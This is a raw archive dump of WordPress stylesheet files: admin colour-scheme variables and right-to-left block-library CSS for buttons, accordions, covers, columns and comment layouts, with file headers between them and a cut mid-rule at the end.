--wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!K yAA"dist/block-library/classic-rtl.cssnuȯ.wp-block-button__link{ background-color:#32373c; border-radius:9999px; box-shadow:none; color:#fff; font-size:1.125em; padding:calc(.667em + 2px) calc(1.333em + 2px); text-decoration:none; } .wp-block-file__button{ background:#32373c; color:#fff; } .wp-block-accordion-heading{ margin:0; } .wp-block-accordion-heading__toggle{ background-color:inherit !important; color:inherit !important; } .wp-block-accordion-heading__toggle:not(:focus-visible){ outline:none; } .wp-block-accordion-heading__toggle:focus,.wp-block-accordion-heading__toggle:hover{ background-color:inherit !important; border:none; box-shadow:none; color:inherit; padding:var(--wp--preset--spacing--20, 1em) 0; text-decoration:none; } .wp-block-accordion-heading__toggle:focus-visible{ outline:auto; outline-offset:0; }PK!y* dist/block-library/theme-rtl.cssnuȯ.wp-block-audio :where(figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-audio :where(figcaption){ color:#ffffffa6; } .wp-block-audio{ margin:0 0 1em; } .wp-block-code{ border:1px solid #ccc; border-radius:4px; font-family:Menlo,Consolas,monaco,monospace; padding:.8em 1em; } .wp-block-embed :where(figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-embed :where(figcaption){ color:#ffffffa6; } .wp-block-embed{ margin:0 0 1em; } .blocks-gallery-caption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .blocks-gallery-caption{ color:#ffffffa6; } :root :where(.wp-block-image figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme :root :where(.wp-block-image figcaption){ color:#ffffffa6; } .wp-block-image{ margin:0 0 1em; } .wp-block-pullquote{ border-bottom:4px solid; border-top:4px solid; color:currentColor; margin-bottom:1.75em; } .wp-block-pullquote :where(cite),.wp-block-pullquote :where(footer),.wp-block-pullquote__citation{ color:currentColor; font-size:.8125em; font-style:normal; text-transform:uppercase; } .wp-block-quote{ border-right:.25em solid; margin:0 0 1.75em; padding-right:1em; } .wp-block-quote cite,.wp-block-quote footer{ color:currentColor; font-size:.8125em; font-style:normal; position:relative; } .wp-block-quote:where(.has-text-align-right){ border-left:.25em solid; border-right:none; padding-left:1em; padding-right:0; } .wp-block-quote:where(.has-text-align-center){ border:none; padding-right:0; } .wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote:where(.is-style-plain){ border:none; } .wp-block-search .wp-block-search__label{ font-weight:700; } .wp-block-search__button{ border:1px solid #ccc; padding:.375em .625em; } :where(.wp-block-group.has-background){ padding:1.25em 2.375em; } .wp-block-separator.has-css-opacity{ opacity:.4; } .wp-block-separator{ border:none; border-bottom:2px solid; margin-left:auto; margin-right:auto; } .wp-block-separator.has-alpha-channel-opacity{ opacity:1; } .wp-block-separator:not(.is-style-wide):not(.is-style-dots){ width:100px; } .wp-block-separator.has-background:not(.is-style-dots){ border-bottom:none; height:1px; } .wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){ height:2px; } .wp-block-table{ margin:0 0 1em; } .wp-block-table td,.wp-block-table th{ word-break:normal; } .wp-block-table :where(figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-table :where(figcaption){ color:#ffffffa6; } .wp-block-video :where(figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-video :where(figcaption){ color:#ffffffa6; } .wp-block-video{ margin:0 0 1em; } :root :where(.wp-block-template-part.has-background){ margin-bottom:0; margin-top:0; padding:1.25em 2.375em; }PK!Edndd$dist/block-library/style-rtl.min.cssnuȯ@charset "UTF-8";.wp-block-accordion{box-sizing:border-box}.wp-block-accordion-item.is-open>.wp-block-accordion-heading .wp-block-accordion-heading__toggle-icon{transform:rotate(-45deg)}@media (prefers-reduced-motion:no-preference){.wp-block-accordion-item{transition:grid-template-rows .3s ease-out}.wp-block-accordion-item>.wp-block-accordion-heading .wp-block-accordion-heading__toggle-icon{transition:transform .2s ease-in-out}}.wp-block-accordion-heading__toggle{align-items:center;background:none;border:none;color:inherit;cursor:pointer;display:flex;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;overflow:hidden;padding:var(--wp--preset--spacing--20,1em) 0;text-align:inherit;text-decoration:inherit;text-transform:inherit;width:100%;word-spacing:inherit}.wp-block-accordion-heading__toggle:not(:focus-visible){outline:none}.wp-block-accordion-heading__toggle:hover .wp-block-accordion-heading__toggle-title{text-decoration:underline}.wp-block-accordion-heading__toggle-title{flex:1}.wp-block-accordion-heading__toggle-icon{align-items:center;display:flex;height:1.2em;justify-content:center;width:1.2em}.wp-block-accordion-panel[aria-hidden=true],.wp-block-accordion-panel[inert]{display:none;margin-block-start:0}.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-breadcrumbs{box-sizing:border-box}.wp-block-breadcrumbs ol{flex-wrap:wrap;list-style:none}.wp-block-breadcrumbs li,.wp-block-breadcrumbs ol{align-items:center;display:flex;margin:0;padding:0}.wp-block-breadcrumbs li:not(:last-child):after{content:var(--separator,"/");margin:0 .5em;opacity:.7}.wp-block-breadcrumbs span{color:inherit}.wp-block-button__link{align-content:center;box-sizing:border-box;cursor:pointer;display:inline-block;height:100%;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-button.wp-block-button__width-25{width:calc(25% - var(--wp--style--block-gap, .5em)*.75)}.wp-block-buttons>.wp-block-button.wp-block-button__width-50{width:calc(50% - var(--wp--style--block-gap, .5em)*.5)}.wp-block-buttons>.wp-block-button.wp-block-button__width-75{width:calc(75% - var(--wp--style--block-gap, .5em)*.25)}.wp-block-buttons>.wp-block-button.wp-block-button__width-100{flex-basis:100%;width:100%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{width:25%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{width:50%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{width:75%}.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{border-radius:0}.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{border-radius:0!important}:root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link){border:2px solid;padding:.667em 1.333em}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){color:currentColor}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background)){background-color:initial;background-image:none}.wp-block-buttons{box-sizing:border-box}.wp-block-buttons.is-vertical{flex-direction:column}.wp-block-buttons.is-vertical>.wp-block-button:last-child{margin-bottom:0}.wp-block-buttons>.wp-block-button{display:inline-block;margin:0}.wp-block-buttons.is-content-justification-left{justify-content:flex-start}.wp-block-buttons.is-content-justification-left.is-vertical{align-items:flex-start}.wp-block-buttons.is-content-justification-center{justify-content:center}.wp-block-buttons.is-content-justification-center.is-vertical{align-items:center}.wp-block-buttons.is-content-justification-right{justify-content:flex-end}.wp-block-buttons.is-content-justification-right.is-vertical{align-items:flex-end}.wp-block-buttons.is-content-justification-space-between{justify-content:space-between}.wp-block-buttons.aligncenter{text-align:center}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;width:100%}.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons .wp-block-button__link{width:100%}.wp-block-button.aligncenter,.wp-block-calendar{text-align:center}.wp-block-calendar td,.wp-block-calendar th{border:1px solid;padding:.25em}.wp-block-calendar th{font-weight:400}.wp-block-calendar caption{background-color:inherit}.wp-block-calendar table{border-collapse:collapse;width:100%}.wp-block-calendar table.has-background th{background-color:inherit}.wp-block-calendar table.has-text-color th{color:inherit}.wp-block-calendar :where(table:not(.has-text-color)){color:#40464d}.wp-block-calendar :where(table:not(.has-text-color)) td,.wp-block-calendar :where(table:not(.has-text-color)) th{border-color:#ddd}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}.wp-block-categories{box-sizing:border-box}.wp-block-categories.alignleft{margin-right:2em}.wp-block-categories.alignright{margin-left:2em}.wp-block-categories.wp-block-categories-dropdown.aligncenter{text-align:center}.wp-block-categories .wp-block-categories__label{display:block;width:100%}.wp-block-code{box-sizing:border-box}.wp-block-code code{direction:ltr;display:block;font-family:inherit;overflow-wrap:break-word;text-align:initial;white-space:pre-wrap}.wp-block-columns{box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns{align-items:normal!important}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns.are-vertically-aligned-bottom{align-items:flex-end}@media (max-width:781px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{flex-grow:0}}.wp-block-columns.is-not-stacked-on-mobile{flex-wrap:nowrap!important}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{flex-grow:0}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}.wp-block-column{flex-grow:1;min-width:0;overflow-wrap:break-word;word-break:break-word}.wp-block-column.is-vertically-aligned-top{align-self:flex-start}.wp-block-column.is-vertically-aligned-center{align-self:center}.wp-block-column.is-vertically-aligned-bottom{align-self:flex-end}.wp-block-column.is-vertically-aligned-stretch{align-self:stretch}.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{width:100%}.wp-block-post-comments{box-sizing:border-box}.wp-block-post-comments .alignleft{float:right}.wp-block-post-comments .alignright{float:left}.wp-block-post-comments .navigation:after{clear:both;content:"";display:table}.wp-block-post-comments .commentlist{clear:both;list-style:none;margin:0;padding:0}.wp-block-post-comments .commentlist .comment{min-height:2.25em;padding-right:3.25em}.wp-block-post-comments .commentlist .comment p{font-size:1em;line-height:1.8;margin:1em 0}.wp-block-post-comments .commentlist .children{list-style:none;margin:0;padding:0}.wp-block-post-comments .comment-author{line-height:1.5}.wp-block-post-comments .comment-author .avatar{border-radius:1.5em;display:block;float:right;height:2.5em;margin-left:.75em;margin-top:.5em;width:2.5em}.wp-block-post-comments .comment-author cite{font-style:normal}.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;margin-bottom:1em;margin-top:1em}.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments .comment-reply-title{margin-bottom:0}.wp-block-post-comments .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-right:.5em}.wp-block-post-comments .reply{font-size:.875em;margin-bottom:1.4em}.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}.wp-block-comments{box-sizing:border-box}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{font-size:inherit}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{display:inline-block;margin-left:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{display:inline-block;margin-right:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-comments-pagination.aligncenter{justify-content:center}.wp-block-comment-template{box-sizing:border-box;list-style:none;margin-bottom:0;max-width:100%;padding:0}.wp-block-comment-template li{clear:both}.wp-block-comment-template ol{list-style:none;margin-bottom:0;max-width:100%;padding-right:2rem}.wp-block-comment-template.alignleft{float:right}.wp-block-comment-template.aligncenter{margin-left:auto;margin-right:auto;width:fit-content}.wp-block-comment-template.alignright{float:left}.wp-block-comment-date{box-sizing:border-box}.comment-awaiting-moderation{display:block;font-size:.875em;line-height:1.5}.wp-block-comment-author-name,.wp-block-comment-content,.wp-block-comment-edit-link,.wp-block-comment-reply-link{box-sizing:border-box}.wp-block-cover,.wp-block-cover-image{align-items:center;background-position:50%;box-sizing:border-box;direction:ltr;display:flex;justify-content:center;min-height:430px;overflow:hidden;overflow:clip;padding:1em;position:relative}.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){background-color:#000}.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{background-color:initial}.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{background-color:inherit;content:""}.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{bottom:0;left:0;opacity:.5;position:absolute;right:0;top:0}.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{opacity:.1}.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{opacity:.2}.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{opacity:.3}.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{opacity:.4}.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{opacity:.5}.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{opacity:.6}.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{opacity:.7}.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{opacity:.8}.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{opacity:1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{opacity:0}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{opacity:.1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{opacity:.2}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{opacity:.3}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{opacity:.4}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{opacity:.5}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{opacity:.6}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{opacity:.7}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{opacity:.8}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{opacity:.9}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{opacity:1}.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{max-width:420px;width:100%}.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{display:flex}.wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{color:inherit;direction:rtl;position:relative;width:100%}.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{align-items:flex-start;justify-content:flex-start}.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{align-items:flex-start;justify-content:center}.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{align-items:flex-start;justify-content:flex-end}.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{align-items:center;justify-content:flex-start}.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{align-items:center;justify-content:center}.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{align-items:center;justify-content:flex-end}.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{align-items:flex-end;justify-content:flex-start}.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{align-items:flex-end;justify-content:center}.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{align-items:flex-end;justify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left 